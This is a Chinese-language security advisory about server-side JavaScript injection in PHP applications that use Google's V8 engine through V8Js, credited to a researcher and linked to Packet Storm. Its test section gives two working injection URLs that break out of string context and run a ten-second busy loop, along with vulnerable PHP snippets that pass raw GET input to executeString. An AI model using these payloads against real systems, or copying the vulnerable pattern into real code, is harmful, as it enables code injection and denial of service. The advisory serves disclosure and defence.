Google V8服务器端JavaScript注入漏洞

受影响系统:

Google V8 JavaScript Engine

描述:


Chromium是开源Web浏览器项目。V8是Google的开源JavaScript引擎。

Google的V8服务器端引擎在实现上存在SSJS漏洞,攻击者通过PHP中的服务器端JavaScript注入漏洞导致注入任意代码。

<*来源:Felipe Aragon (felipe@syhunt.com

链接:http://packetstormsecurity.org/files/110210/Google-V8-Server-Side-Javascript-Injection.html
*>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

vulnerable.php?msg=a’;d%20=%20new%20Date();do{cd=new%20Date();}while(cd-d<10000);foo=’bar

Vulnerable Code:

$msg = $_GET[‘msg’];
$v8 = new V8Js();
$v8->executeString(“var msg = ‘$msg’; ..SOME CODE..”);

vulnerable.php?msg=version());d%20=%20new%20Date();do{cd=new%20Date();}while(cd-d<10000);foo=(‘bar’

Vulnerable Code:

$msg = $_GET[‘msg’];
$v8 = new V8Js();
$JS = <<< EOT
len = print($msg + “\\n”);
..SOME CODE..
EOT;

$v8->executeString($JS, ‘basic.js’);

建议:


厂商补丁:

Google
——
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.google.com

评论关闭。